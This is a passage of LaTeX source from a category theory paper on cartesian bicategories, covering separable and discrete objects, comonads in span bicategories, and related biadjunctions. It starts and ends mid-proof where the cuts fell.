\morphism(250,-250)|a|<150,0>[`;\tilde r_{1_A,d^*}]
\efig$$
The paste composite of the squares is invertible (being
essentially the identity 2-cell on $d^*$). The lower 2-cell is invertible
by Proposition 4.7 of \cite{ckww} so that the whisker composite
$r\delta_1$ is invertible. Since $r$ is a map it reflects isomorphisms, by
Maps are Comonadic, and hence $\delta_1$ is invertible.
\frp
\rmk\label{frobclofin} It was shown in \cite{ww} that, in a cartesian
bicategory, the Frobenius objects are closed under finite products.
It follows that the full subbicategory of a cartesian bicategory
determined by the Frobenius objects is a cartesian bicategory
which satisfies the Frobenius axiom.
\eth
\section{Separable Objects and Discrete Objects
in Cartesian Bicategories}\label{Sep}
In this section we look at separability for objects of cartesian bicategories.
Since, for an object $A$ which is both separable and Frobenius, the hom-category
$\mathrm{Map}\mathbf{B}(X,A)$ is essentially discrete for all $X$, we shall then be able to
show that $\mathrm{Map}\mathbf{B}$ is locally essentially discrete by showing that all objects of $\mathbf{B}$
are separable and Frobenius. But first we record the following direct argument:
\begin{proposition}\label{easy}
If $\mathbf{B}$ is a bicategory in which all maps are comonadic and $\mathrm{Map}\mathbf{B}$ has
a terminal object, then $\mathrm{Map}\mathbf{B}$ is locally essentially discrete.
\end{proposition}
\prf
We must show that for all objects $X$ and $A$, the hom-category $\mathrm{Map}\mathbf{B}(X,A)$
is essentially discrete. As usual, we write $1$ for the terminal object of $\mathrm{Map}\mathbf{B}$
and $t_A:A\to 1$ for the essentially unique map, which by assumption is
comonadic. Let $f,g:X\to A$ be maps from $X$ to $A$. If $\alpha:f\to g$ is any
2-cell, then $t_A\alpha$ is invertible, since $1$ is terminal in $\mathrm{Map}\mathbf{B}$. But
since $t_A$ is comonadic, it reflects isomorphisms, and so $\alpha$ is invertible.
Furthermore, if $\beta:f\to g$ is another 2-cell, then $t_A\alpha=t_A\beta$ by
the universal property of $1$ once again, and now $\alpha=\beta$ since $t_A$
is faithful. Thus there is at most one 2-cell from $f$ to $g$, and any such 2-cell
is invertible.
\frp
In any (bi)category with finite products the diagonal
arrows $d_A{\kern -.25em}:{\kern -.25em} A{\,\s\to}\, A\times A$ are (split) monomorphisms so that
in the bicategory $\mathbf{M}$ the following square is a product-absolute
pullback
$$\bfig
\square(0,0)[A`A`A`A\otimes A;1_A`1_A`d_A`d_A]
\efig$$
that gives rise to a single $\mathbf{G}$ arrow.
\dfn\label{sep}
An object $A$ in a cartesian bicategory is said to be
{\em separable} if the $\mathbf{G}$ arrow above satisfies the Beck
condition.
\eth
Of course the invertible mate condition here says precisely that the
unit $\eta_{d_A}\f1_A{\,\s\to}\, d_A^*d_A$ for the adjunction
$d_A\dashv d_A^*$ is invertible. Thus Axiom \ref{sepax}, as stated in
the Introduction, says that, for all $A$ in $\mathbf{B}$, $\eta_{d_A}$ is
invertible.
\rmk\label{sepcat} For a map $f$ it makes sense to define
{\em $f$ is fully faithful} to mean that $\eta_f$ is invertible. For
a {\em category $A$} the diagonal $d_A$ is fully faithful if and only
if $A$ is an ordered set.
\eth
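For example, every object of $\mathrm{Span}\,{\cal E}$ is separable: the composite
$d^*_Ad_A$ is the span obtained by pulling back $d_A$ along itself,
and since $d_A$ is a monomorphism this pullback is
$$A\xleftarrow{\;1_A\;}A\xrightarrow{\;1_A\;}A\,,$$
so that $\eta_{d_A}{\kern -.25em}:{\kern -.25em} 1_A{\,\s\to}\, d^*_Ad_A$ is invertible. More
generally, a map $f$ in $\mathrm{Span}\,{\cal E}$ is fully faithful in the sense of
Remark~\ref{sepcat} precisely when the corresponding arrow of ${\cal E}$
is a monomorphism, since $f^*f$ is computed by the kernel pair of $f$.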
\prp\label{sepmeans}
For an object $A$ in a cartesian bicategory,
the following are equivalent:
\begin{enumerate}[$i)$]
\item $A$ is separable;
\item for all $f{\kern -.25em}:{\kern -.25em} X{\,\s\to}\, A$ in $\mathbf{M}$, the diagram $f\,{\s\toleft}\, f{\,\s\to}\, f$ is a product in
$\mathbf{B}(X,A)$;
\item $1_A\,{\s\toleft}\, 1_A{\,\s\to}\, 1_A$ is a product in $\mathbf{B}(A,A)$;
\item $1_A{\,\s\to}\,\top_{A,A}$ is a monomorphism in $\mathbf{B}(A,A)$;
\item for all $G\ra1_A$ in $\mathbf{B}(A,A)$, the diagram $G\,{\s\toleft}\, G\ra1_A$ is
a product in $\mathbf{B}(A,A)$.
\end{enumerate}
\eth
\prf
$[i)\Longrightarrow$ $ii)]$ A local product of maps is not generally a
map but here we have:
$$f\wedge f\cong d_A^*(f\otimes f)d_X\cong d_A^*(f\times f)d_X\cong%
d_A^*d_A f\cong f$$
$[ii)\Longrightarrow$ $iii)]$ is trivial.
$[iii)\Longrightarrow$ $i)]$ Note the use of
pseudo-functoriality of $\otimes$:
$$d^*_Ad_A\cong d^*_A1_{A\otimes A}d_A\cong d^*_A(1_A\ox1_A)d_A%
\iso1_A\wedge1_A\iso1_A$$
$[iii)\Longrightarrow$ $iv)]$ To say that $1_A\,{\s\toleft}\, 1_A{\,\s\to}\, 1_A$ is a
product in $\mathbf{B}(A,A)$ is precisely to say that
$$\bfig
\square(0,0)[1_A`1_A`1_A`\top_{A,A};1_{1_A}`1_{1_A}``]
\efig$$
is a pullback in $\mathbf{B}(A,A)$ which in turn is precisely to say that
$1_A{\,\s\to}\,\top_{A,A}$ is a monomorphism in $\mathbf{B}(A,A)$.
$[iv)\Longrightarrow$ $v)]$ It is a generality that if an object
$S$ in a category is subterminal then for any $G{\,\s\to}\, S$, necessarily
unique, $G\,{\s\toleft}\, G{\,\s\to}\, S$ is a product diagram.
$[v)\Longrightarrow$ $iii)]$ is trivial.
\frp
\cor\label{mcisep}{\rm [Of $iv)$]} For a cartesian bicategory, the axiom {\em Maps are
Comonadic} implies the axiom {\em Separable}.
\eth
\prf
We have $\top_{A,A}=t_A^*t_A$ for the map $t_A{\kern -.25em}:{\kern -.25em} A\ra1$. It follows
that the unique $1_A{\,\s\to}\, t_A^*t_A$ is $\eta_{t_A}$. Since $t_A$ is
comonadic, $\eta_{t_A}$ is the equalizer shown:
$$1_A\to^{\eta_{t_A}}t_A^*t_A\two%
^{t_A^*t_A\eta_{t_A}}_{\eta_{t_A}t_A^*t_A}t_A^*t_At_A^*t_A$$
and hence a monomorphism.
\frp
\cor\label{copt}{\rm [Of $iv)$]} For separable $A$ in cartesian $\mathbf{B}$, an
arrow $G{\kern -.25em}:{\kern -.25em} A{\,\s\to}\, A$ admits at most one copoint $G{\,\s\to}\, 1_A$; it admits
one precisely when the unique arrow $G{\,\s\to}\,\top_{A,A}$ factors through
$1_A{\scalefactor{0.75}\mon}\top_{A,A}$.
\frp
\eth
\prp\label{sepclofin} In a cartesian bicategory,
the separable objects are closed under finite products.
\eth
\prf
If $A$ and $B$ are separable objects then applying
the homomorphism
$\otimes{\kern -.25em}:{\kern -.25em}\mathbf{B}\times\mathbf{B}{\,\s\to}\,\mathbf{B}$
we have an adjunction $d_A\times d_B\dashv d_A^*\otimes d_B^*$ with
unit $\eta_{d_A}\otimes\eta_{d_B}$ which being an isomorph of the
adjunction $d_{A\otimes B}\dashv d^*_{A\otimes B}$ with unit
$\eta_{d_{A\otimes B}}$ (via middle-four interchange) shows that the separable
objects are closed under binary products. On the other hand, $d_I$ is an
equivalence so that $I$ is also separable.
\frp
\cor\label{eos}
For a cartesian bicategory, the full subbicategory determined by
the separable objects is a cartesian bicategory which satisfies the axiom
{\em Separable}.
\frp
\eth
\prp\label{ordhom}
If $A$ is a separable object in a cartesian bicategory $\mathbf{B}$,
then, for all $X$ in $\mathbf{B}$, the hom-category $\mathbf{M}(X,A)$ is an ordered
set, meaning that the category structure forms a reflexive,
transitive relation.
\eth
\prf
Suppose that we have arrows $\alpha,\beta{\kern -.25em}:{\kern -.25em} g{\scalefactor{0.5} \two}f$ in
$\mathbf{M}(X,A)$. In $\mathbf{B}(X,A)$ we have
$$\bfig
\Atriangle(0,0)/->`->`/[g`f`f;\alpha`\beta`]
\morphism(500,500)|m|<0,-500>[g`f\wedge f;\gamma]
\morphism(500,0)|b|<-500,0>[f\wedge f`f;\pi]
\morphism(500,0)|b|<500,0>[f\wedge f`f;\rho]
\efig$$
By Proposition \ref{sepmeans} we can take $f\wedge f =f$ and
$\pi=1_f=\rho$ so that we have $\alpha=\gamma=\beta$. It follows
that $\mathbf{M}(X,A)$ is an ordered set.
\frp
\dfn\label{discrete}
An object $A$ in a cartesian bicategory is said to be
{\em discrete} if it is both Frobenius and separable. We write
$\mathrm{Dis}\mathbf{B}$ for the full subbicategory of $\mathbf{B}$ determined
by the discrete objects.
\eth
\begin{remark}
Beware that this is quite different to the notion of discreteness in a bicategory.
An object $A$ of a bicategory is discrete if each hom-category $\mathbf{B}(X,A)$ is
discrete; $A$ is essentially discrete if each $\mathbf{B}(X,A)$ is equivalent to a discrete category. The notion of discreteness for cartesian bicategories defined above turns out to mean
that $A$ is essentially discrete in the bicategory $\mathrm{Map}\mathbf{B}$.
\end{remark}
From Proposition \ref{sepclofin} above and Proposition 3.4 of \cite{ww}
we immediately have
\prp\label{eod}
For a cartesian bicategory $\mathbf{B}$, the full subbicategory
$\mathrm{Dis}\mathbf{B}$ of discrete objects is a cartesian bicategory in which
every object is discrete.
\frp
\eth
And from Proposition \ref{ordhom} above and Theorem 3.13 of \cite{ww}
we have
\prp\label{dishom}
If $A$ is a discrete object in a cartesian bicategory $\mathbf{B}$
then, for all $X$ in $\mathbf{B}$, the hom category $\mathbf{M}(X,A)$ is an
equivalence relation.
\frp
\eth
If both the {\em Frobenius} axiom of \cite{ww}
and the {\em Separable} axiom of this paper hold for our cartesian
bicategory $\mathbf{B}$, then every object of $\mathbf{B}$ is discrete. In
this case, because $\mathbf{M}$ is a bicategory, the equivalence relations
$\mathbf{M}(X,A)$ are stable under composition from both sides. Thus
writing $|\mathbf{M}(X,A)|$ for the set of objects of $\mathbf{M}(X,A)$ we have
a mere category ${\cal E}$, whose objects are those
of $\mathbf{M}$ (and hence also those of $\mathbf{B}$) and whose hom sets are
the quotients $|\mathbf{M}(X,A)|/\mathbf{M}(X,A)$. If the ${\cal E}(X,A)$
are regarded as discrete categories, so that ${\cal E}$ is a locally
discrete bicategory, then the functors
$\mathbf{M}(X,A){\,\s\to}\, |\mathbf{M}(X,A)|/\mathbf{M}(X,A)$ constitute the effect-on-homs functors
for an identity-on-objects biequivalence $\mathbf{M}{\,\s\to}\, {\cal E}$. To summarize:
\thm\label{odibld} If a cartesian bicategory $\mathbf{B}$ satisfies both the Frobenius
and Separable axioms then the bicategory of maps $\mathbf{M}$ is
biequivalent to the locally discrete bicategory ${\cal E}$. \frp
\eth
In the following lemma we show that any copointed endomorphism of a discrete
object can be made into a comonad; later on, we shall see that this comonad
structure is in fact unique.
\lem\label{diag} If $A$ is a discrete object in a
cartesian bicategory $\mathbf{B}$ then, for any copointed endomorphism arrow
$\epsilon{\kern -.25em}:{\kern -.25em} G{\,\s\to}\, 1_A{\kern -.25em}:{\kern -.25em} A{\,\s\to}\, A$, there is a 2-cell
$\delta=\delta_G{\kern -.25em}:{\kern -.25em} G{\,\s\to}\, GG$
satisfying
$$\bfig
\Atriangle(0,0)/->`->`/[G`G`G;1`1`]
\morphism(500,500)|m|<0,-500>[G`GG;\delta]
\morphism(500,0)|b|<-500,0>[GG`G;G\epsilon]
\morphism(500,0)|b|<500,0>[GG`G;\epsilon G]
\efig$$
and if both $G,H{\kern -.25em}:{\kern -.25em} A{\s\two} A$ are copointed, so that $GH{\kern -.25em}:{\kern -.25em} A{\,\s\to}\, A$
is also copointed, and $\phi{\kern -.25em}:{\kern -.25em} G{\,\s\to}\, H$ is any 2-cell, then the
$\delta$'s satisfy
$$\bfig
\square(0,0)[G`H`GG`HH;\phi`\delta`\delta`\phi\phi]
\place(1000,0)[\mbox{and}]
\Atriangle(1500,0)/<-`->`->/%
[GHGH`GH`GH;\delta`(G\epsilon)(\epsilon H)`1]
\efig$$
\eth
\prf
We define $\delta=\delta_G$ to be the pasting composite
$$\bfig
\qtriangle(0,0)|amm|[A`AA`AAA;d`d_3`1d]
\square(500,0)|amma|[AA`AA`AAA`AAA;G1`1d`1d`G11]
\square(1000,0)|amma|[AA`A`AAA`AA;d^*`1d`d`d^*1]
\qtriangle(500,-500)|abr|[AAA`AAA`AAA;G11`GGG`11G]
\square(1000,-500)|arma|[AAA`AA`AAA`AA;d^*1`11G`1G`d^*1]
\qtriangle(1000,-1000)|amm|[AAA`AA`A;d^*1`d_3^*`d^*]
\morphism(0,500)|b|/{@{->}@/_4em/}/<1500,-1500>[A`A;G\wedge G\wedge G]
\morphism(0,500)|b|/{@{->}@/_8em/}/<1500,-1500>[A`A;G]
\morphism(0,500)|a|/{@{->}@/^3em/}/<1500,0>[A`A;G]
\morphism(1500,500)|r|/{@{->}@/^3em/}/<0,-1500>[A`A;G]
\morphism(800,-250)|m|<150,150>[`;G\epsilon G]
\morphism(300,-800)|m|<150,150>[`;\delta_3]
\place(1250,250)[1]
\place(750,675)[2]
\place(1700,-250)[3]
\place(750,250)[4]
\place(1250,-250)[5]
\place(600,-450)[6]
\efig$$
wherein $\otimes$ has been abbreviated by juxtaposition and all
subregions not explicitly inhabited by a 2-cell are deemed to
be inhabited by the obvious invertible 2-cell. A reference number has been
assigned to those invertible 2-cells which arise from the hypotheses.
As in \cite{ww}, $d_3$'s denote 3-fold diagonal maps and, similarly,
we write $\delta_3$ for a local 3-fold diagonal.
The invertible 2-cell labelled by `1' is that defining $A$ to be
Frobenius. The 3-fold composite of arrows in the region labelled
by `2' is $G\wedge1_A$ and, similarly, in that labelled by `3' we have
$1_A\wedge G$. Each of these is isomorphic to $G$ because $A$ is
separable and $G$ is copointed. The isomorphisms in `4' and `5'
express the pseudo-functoriality of $\otimes$ in the cartesian bicategory
$\mathbf{B}$. Finally `6' expresses the ternary local product in terms of
the ternary $\otimes$ as in \cite{ww}. Demonstration of the equations is
effected easily by pasting composition calculations.
\frp
\thm\label{wedge=.} If $G$ and $H$ are copointed endomorphisms
on a discrete $A$ in a cartesian $\mathbf{B}$ then
$$G\toleft^{G\epsilon}GH\to^{\epsilon H}H$$
is a product diagram in $\mathbf{B}(A,A)$.
\eth
\prf
If we are given $\alpha{\kern -.25em}:{\kern -.25em} K{\,\s\to}\, G$ and $\beta{\kern -.25em}:{\kern -.25em} K{\,\s\to}\, H$ then $K$ is
also copointed and we have
$$K\to^\delta KK\to^{\alpha\beta}GH$$
as a candidate pairing. That this candidate satisfies the universal
property follows from the equations of Lemma \ref{diag} which
are precisely those in the equational description of binary products.
We remark that the `naturality' equations for the projections follow
immediately from uniqueness of copoints.
\frp
\cor\label{comsim} If $A$ is discrete in a cartesian $\mathbf{B}$, then an endo-arrow
$G{\kern -.25em}:{\kern -.25em} A{\,\s\to}\, A$ admits a comonad structure if and only if $G$ admits
a copoint, and any such comonad structure is unique.
\eth
\prf
The Theorem shows that the arrow $\delta{\kern -.25em}:{\kern -.25em} G{\,\s\to}\, GG$ constructed in Lemma
\ref{diag} is the product diagonal on $G$ in the category $\mathbf{B}(A,A)$ and,
given $\epsilon{\kern -.25em}:{\kern -.25em} G{\,\s\to}\, 1_A$, this is the only comonad comultiplication on $G$.
\frp
\rmk
It is clear that $1_A$ is terminal with respect to the copointed
objects in $\mathbf{B}(A,A)$.
\eth
\prp\label{subterm} If an object $B$ in a bicategory $\mathbf{B}$ has $1_B$
subterminal in $\mathbf{B}(B,B)$ then, for any map $f{\kern -.25em}:{\kern -.25em} A{\,\s\to}\, B$, $f$ is subterminal in $\mathbf{B}(A,B)$ and $f^*$ is subterminal in $\mathbf{B}(B,A)$. In particular, in a
cartesian bicategory in which every object is separable, every adjoint
arrow is subterminal.
\eth
\prf
Precomposition with a map preserves terminal objects and monomorphisms,
as does postcomposition with a right adjoint.
\frp
\section{Bicategories of Comonads}\label{Coms}
The starting point of this section is the observation, made in the introduction,
that a comonad in the bicategory $\mathrm{Span}\,{\cal E}$ is
precisely a span of the form
$$A \xleftarrow{g} X \xrightarrow{g} A$$
in which both legs are equal.
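To make this explicit (a routine verification, sketched here): writing
$G=(g,X,g)$, the composite span $GG$ is the kernel pair $X\times_AX$ of $g$,
and the comonad structure is necessarily
$$\epsilon_G=g{\kern -.25em}:{\kern -.25em} G{\,\s\to}\, 1_A
\qquad\mbox{and}\qquad
\delta_G=(1_X,1_X){\kern -.25em}:{\kern -.25em} G{\,\s\to}\, GG,$$
the counit being the unique morphism of spans from $(g,X,g)$ to the identity
span $(1_A,A,1_A)$, and the comultiplication the diagonal into the kernel
pair.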
We will write $\mathbf{C}=\mathrm{Com}\mathbf{B}$ for the bicategory of comonads in $\mathbf{B}$,
$\mathrm{Com}$ being one of the duals of Street's construction $\mathrm{Mnd}$
in \cite{ftm}. Thus $\mathbf{C}$ has objects given by the comonads $(A,G)$
of $\mathbf{B}$. The structure 2-cells for comonads will be denoted
$\epsilon=\epsilon_G$, for counit and $\delta=\delta_G$, for
comultiplication. An arrow
in $\mathbf{C}$ from $(A,G)$ to $(B,H)$ is a pair $(F,\phi)$ as shown in
$$\bfig
\square(0,0)[A`B`A`B;F`G`H`F]
\morphism(125,250)|a|<250,0>[`;\phi]
\efig$$
satisfying
\begin{equation}\label{comarrow}
\bfig
\square(0,0)[FG`HF`F1_A`1_BF;\phi`F\epsilon`\epsilon F`=]
\place(1000,250)[\mbox{and}]
\square(1500,0)/`->``->/[FG``FGG`HFG;`F\delta``\phi G]
\square(2000,0)/``->`->/[`HF`HFG`HHF;``\delta F`H\phi]
\morphism(1500,500)<1000,0>[FG`HF;\phi]
\efig
\end{equation}
(where, as often, we have suppressed the associativity constraints of
our normal, cartesian, bicategory $\mathbf{B}$).
A 2-cell $\tau{\kern -.25em}:{\kern -.25em}(F,\phi){\,\s\to}\,(F',\phi'){\kern -.25em}:{\kern -.25em}(A,G){\,\s\to}\,(B,H)$ in $\mathbf{C}$
is a 2-cell $\tau{\kern -.25em}:{\kern -.25em} F{\,\s\to}\, F'$ in $\mathbf{B}$ satisfying
\begin{equation}\label{comtrans}
\bfig
\square(0,0)[FG`HF`F'G`HF';\phi`\tau G`H\tau`\phi']
\efig
\end{equation}
There is a pseudofunctor $I{\kern -.25em}:{\kern -.25em}\mathbf{B}{\,\s\to}\,\mathbf{C}$ given by
$$I(\tau{\kern -.25em}:{\kern -.25em} F{\,\s\to}\, F'{\kern -.25em}:{\kern -.25em} A{\,\s\to}\, B)=%
\tau{\kern -.25em}:{\kern -.25em} (F,1_{F}){\,\s\to}\, (F',1_{F'}){\kern -.25em}:{\kern -.25em} (A,1_A){\,\s\to}\, (B,1_B)$$
From \cite{ftm} it is well known that a bicategory $\mathbf{B}$
has Eilenberg-Moore objects for comonads
if and only if $I{\kern -.25em}:{\kern -.25em}\mathbf{B}{\,\s\to}\,\mathbf{C}$ has a right biadjoint, which we will
denote by $E{\kern -.25em}:{\kern -.25em}\mathbf{C}{\,\s\to}\,\mathbf{B}$. We write $E(A,G)=A_G$ and the counit
for $I\dashv E$ is denoted by
$$\bfig
\square(0,0)[A_G`A`A_G`A;g_G`1_{A_G}`G`g_G]
\morphism(125,250)|a|<250,0>[`;\gamma_G]
\Ctriangle(2500,0)/<-`->`->/<500,250>[A`A_G`A;g_G`G`g_G]
\place(1500,250)[\mbox{ or, using normality of $\mathbf{B}$, better by }]
\morphism(2700,250)|m|<200,0>[`;\gamma_G]
\efig$$
with $(g_G,\gamma_G)$ abbreviated to $(g,\gamma)$ when there is
no danger of confusion. It is standard that each $g=g_G$ is necessarily
a map (whence our lower case notation) and the mate $gg^*{\,\s\to}\, G$ of
$\gamma$ is an isomorphism which identifies $\epsilon_g$ and
$\epsilon_G$.
We will write $\mathbf{D}$ for the locally full subbicategory
of $\mathbf{C}$ determined by all the objects and those arrows of the form $(f,\phi)$,
where $f$ is a map, and write $j{\kern -.25em}:{\kern -.25em}\mathbf{D}{\,\s\to}\,\mathbf{C}$ for the inclusion.
It is clear that the
pseudofunctor $I{\kern -.25em}:{\kern -.25em}\mathbf{B}{\,\s\to}\,\mathbf{C}$ restricts to give a pseudofunctor
$J{\kern -.25em}:{\kern -.25em}\mathbf{M}{\,\s\to}\,\mathbf{D}$. We say that the bicategory $\mathbf{B}$ {\em has Eilenberg-Moore
objects for comonads, as seen by $\mathbf{M}$}, if $J{\kern -.25em}:{\kern -.25em}\mathbf{M}{\,\s\to}\,\mathbf{D}$ has a right
biadjoint. (In general, this property does not follow from that of
Eilenberg-Moore objects for comonads.)
\begin{remark}\label{rmk:D-for-dummies}
In the case $\mathbf{B}=\mathrm{Span}\,{\cal E}$, a comonad in $\mathbf{B}$ can, as we have seen, be
identified with a morphism in ${\cal E}$. This can be made into the object part of a
biequivalence between the bicategory $\mathbf{D}$ and the category ${\cal E}^\mathbf{2}$
of arrows in ${\cal E}$. If we further identify $\mathbf{M}$ with ${\cal E}$, then the
inclusion $j:\mathbf{D}\to\mathbf{C}$ becomes the diagonal ${\cal E}\to{\cal E}^\mathbf{2}$; of course this
does have a right adjoint, given by the domain functor.
\end{remark}
\thm\label{simcom} If $\mathbf{B}$ is a cartesian bicategory in which every object
is discrete, the bicategory $\mathbf{D}=\mathbf{D}(\mathbf{B})$ admits the following simpler
description:
\begin{enumerate}
\item[$i)$] An object is a pair $(A,G)$ where $A$ is an object of $\mathbf{B}$
and $G{\kern -.25em}:{\kern -.25em} A{\,\s\to}\, A$ admits a copoint;
\item[$ii)$] An arrow $(f,\phi){\kern -.25em}:{\kern -.25em}(A,G){\,\s\to}\,(B,H)$ is a map $f{\kern -.25em}:{\kern -.25em} A{\,\s\to}\, B$ and
a 2-cell $\phi{\kern -.25em}:{\kern -.25em} fG{\,\s\to}\, Hf$;
\item[$iii)$] A 2-cell $\tau{\kern -.25em}:{\kern -.25em}(f,\phi){\,\s\to}\,(f',\phi'){\kern -.25em}:{\kern -.25em}(A,G){\,\s\to}\,(B,H)$ is
a 2-cell $\tau{\kern -.25em}:{\kern -.25em} f{\,\s\to}\, f'$ satisfying equation (\ref{comtrans}).
\end{enumerate}
\eth
\prf
We have i) by Corollary \ref{comsim} while iii) is precisely the description
of a 2-cell in $\mathbf{D}$, modulo the description of the domain and codomain
arrows. So, we have only to show ii), which is to show that the equations
(\ref{comarrow}) hold automatically under the hypotheses. For the first
equation of (\ref{comarrow}) we have uniqueness of any 2-cell $fG{\,\s\to}\, f$
because $f$ is subterminal by Proposition \ref{subterm}. For the second,
observe that the terminating vertex, $HHf$, is the product $Hf\wedge Hf$
in $\mathbf{M}(A,B)$ because $HH$ is the product $H\wedge H$ in $\mathbf{M}(B,B)$ by
Theorem~\ref{wedge=.} and precomposition with a map preserves all limits.
For $HHf$ seen as a product, the projections are, again
by Theorem~\ref{wedge=.}, $H\epsilon f$ and $\epsilon Hf$. Thus, it
suffices to show that the diagram for the second equation commutes when
composed with both $H\epsilon f$ and $\epsilon Hf$. We have
$$\bfig
\square(0,0)/`->``->/[fG``fGG`HfG;`f\delta``\phi G]
\square(500,0)/``->`->/[`Hf`HfG`HHf;``\delta f`H\phi]
\morphism(0,500)<1000,0>[fG`Hf;\phi]
\qtriangle(500,-500)|blr|[HfG`HHf`Hf;H\phi`Hf\epsilon`H\epsilon f]
\morphism(0,-500)|b|<1000,0>[fG`Hf;\phi]
\morphism(0,0)<0,-500>[fGG`fG;fG\epsilon]
\square(2000,0)/`->``->/[fG``fGG`HfG;`f\delta``\phi G]
\square(2500,0)/``->`->/[`Hf`HfG`HHf;``\delta f`H\phi]
\morphism(2000,500)<1000,0>[fG`Hf;\phi]
\ptriangle(2000,-500)|blr|[fGG`HfG`fG;\phi G`f\epsilon G`\epsilon fG]
\morphism(2000,-500)|b|<1000,0>[fG`Hf;\phi]
\morphism(3000,0)|r|<0,-500>[HHf`Hf;\epsilon Hf]
\efig$$
in which each of the lower triangles commutes by the first equation of
(\ref{comarrow}) already established. Using the comonad equations for
$G$ and $H$, one sees that each composite is $\phi$.
\frp
Finally, let us note that $\mathbf{D}$ is
a subbicategory, neither full nor locally full, of the Grothendieck
bicategory $\mathbf{G}$ and write $K{\kern -.25em}:{\kern -.25em}\mathbf{D}{\,\s\to}\,\mathbf{G}$ for the inclusion. We also
write $\iota{\kern -.25em}:{\kern -.25em}\mathbf{M}{\,\s\to}\,\mathbf{G}$
for the composite pseudofunctor $KJ$. Summarizing, we have introduced
the following commutative diagram of bicategories and pseudofunctors
$$\bfig
\square(0,0)[\mathbf{M}`\mathbf{D}`\mathbf{B}`\mathbf{C};J`i`j`I]
\morphism(500,500)<500,0>[\mathbf{D}`\mathbf{G};K]
\morphism(0,500)|a|/{@{->}@/^2em/}/<1000,0>[\mathbf{M}`\mathbf{G};\iota]
\efig$$
Note also that in our main case of interest $\mathbf{B}=\mathrm{Span}\,{\cal E}$, each of $\mathbf{M}$,
$\mathbf{D}$, and $\mathbf{G}$ is biequivalent to a mere category.
Ultimately, we are interested in having a right biadjoint,
say $\tau$, of $\iota$. For such a biadjunction $\iota\dashv\tau$
the counit at an object $R{\kern -.25em}:{\kern -.25em} X{\,\s\to}\, A$ in $\mathbf{G}$ will take the form
\begin{equation}\label{tabcounit}
\bfig
\Ctriangle/<-`->`->/<500,250>[X`\tau R`A;u_R`R`v_R]
\morphism(200,250)|m|<200,0>[`;\omega_R]
\efig
\end{equation}
(where, as for a biadjunction $I\dashv E{\kern -.25em}:{\kern -.25em}\mathbf{C}{\,\s\to}\,\mathbf{B}$, a
triangle rather than a square can be taken as the boundary of
the 2-cell by the normality of $\mathbf{B}$). In fact, we are interested
in the case where we have $\iota\dashv\tau$ and moreover the counit
components $\omega_R{\kern -.25em}:{\kern -.25em} v_R{\,\s\to}\, Ru_R$ enjoy the property that their
mates $v_Ru^*_R{\,\s\to}\, R$ with respect to the adjunction $u_R\dashv u^*_R$
are invertible. In this way we represent a general arrow of $\mathbf{B}$
in terms of a span of maps. Since biadjunctions compose we will
consider adjunctions $J\dashv F$ and $K\dashv G$ and we begin with the
second of these.
\thm\label{G(R)}
For a cartesian bicategory $\mathbf{B}$ in which every object is discrete,
there is an adjunction $K\dashv G{\kern -.25em}:{\kern -.25em}\mathbf{G}{\,\s\to}\,\mathbf{D}$ where, for
$R{\kern -.25em}:{\kern -.25em} X{\,\s\to}\, A$ in $\mathbf{G}$, the comonad $G(R)$ and its witnessing copoint
$\epsilon{\kern -.25em}:{\kern -.25em} G(R){\,\s\to}\, 1_{XA}$ are given by the left diagram below and the
counit $\mu{\kern -.25em}:{\kern -.25em} KG(R){\,\s\to}\, R$ is given by the right diagram below,
all in notation suppressing $\otimes$:
$$\bfig
\ptriangle(-1500,1000)/->`->`<-/[XA`XA`XXA;1_{XA}`dA`p_{1,3}]
\morphism(-1400,1350)|a|<150,0>[`;\simeq]
\morphism(-1500,1000)|l|<0,-500>[XXA`XAA;XRA]
\morphism(-1000,1500)|r|<0,-1500>[XA`XA;1_{XA}]
\morphism(-1375,750)|m|<250,0>[`;\tilde p_{1,3}]
\btriangle(-1500,0)[XAA`XA`XA;Xd^*`p_{1,3}`1_{XA}]
\morphism(-1400,150)|a|<150,0>[`;]
\morphism(-1500,1500)|l|/{@{->}@/_3.5em/}/<0,-1500>[XA`XA;G(R)]
\ptriangle(0,1000)/->`->`<-/[XA`X`XXA;p`dA`p_2]
\morphism(0,1000)|l|<0,-500>[XXA`XAA;XRA]
\morphism(500,1500)|r|<0,-1500>[X`A;R]
\btriangle(0,0)[XAA`XA`A;Xd^*`p_2`r]
\morphism(100,1350)|a|<150,0>[`;\simeq]
\morphism(125,750)|m|<250,0>[`;\tilde p_2]
\morphism(100,150)|b|<150,0>[`;]
\morphism(0,1500)|l|/{@{->}@/_3.5em/}/<0,-1500>[XA`XA;G(R)]
\efig$$
Moreover, the mate $rG(R)p^*{\,\s\to}\, R$ of the counit $\mu$ is invertible.
In the left diagram, the $p_{1,3}$ collectively denote projection from the
three-fold product in $\mathbf{G}$ to the product of the first and third factors.
In the right diagram, the $p_2$ collectively denote projection from the
three-fold product in $\mathbf{G}$ to the second factor. The upper triangles of the
two diagrams are the canonical isomorphisms. The lower left triangle
is the mate of the canonical isomorphism $1{\scalefactor{0.5} \to^{\simeq}}p_{1,3}(Xd)$.
The lower right triangle is the mate of the canonical isomorphism
$r{\scalefactor{0.5} \to^{\simeq}} p_2(Xd)$.
\eth
\prf Given a comonad $H{\kern -.25em}:{\kern -.25em} T{\,\s\to}\, T$ and an arrow
$$\bfig
\square(0,0)[T`X`T`A;x`H`R`a]
\morphism(125,250)|a|<250,0>[`;\psi]
\efig$$
in $\mathbf{G}$, we verify the adjunction claim by showing that there is
a unique arrow
$$\bfig
\square(0,0)[T`XA`T`XA;f`H`G(R)`f]
\morphism(125,250)|a|<250,0>[`;\phi]
\efig$$
in $\mathbf{D}$, whose composite with the putative counit $\mu$ is
$(x,\psi,a)$. It is immediately clear that the unique solution
for $f$ is $(x,a)$ and to give $\phi{\kern -.25em}:{\kern -.25em}(x,a)H{\,\s\to}\, Xd^*(XRA)dA(x,a)$
is to give the mate $Xd(x,a)H{\,\s\to}\, (XRA)dA(x,a)$ which is
$(x,a,a)H{\,\s\to}\, (XRA)(x,x,a)$ and can be seen as
a $\mathbf{G}$ arrow:
$$\bfig
\square(0,0)[T`XXA`T`XAA;(x,x,a)`H`XRA`(x,a,a)]
\morphism(125,250)|a|<250,0>[`;(\alpha,\beta,\gamma)]
\efig$$
where we exploit the description of products in $\mathbf{G}$. From this
description it is clear, since $\tilde p_2(\alpha,\beta,\gamma)=\beta$
as a composite in $\mathbf{G}$, that the unique solution for $\beta$ is
$\psi$. We have seen in Theorem \ref{simcom} that the conditions
(\ref{comarrow}) hold automatically in $\mathbf{D}$ under the assumptions
of the Theorem. From the first of these we have:
$$\bfig
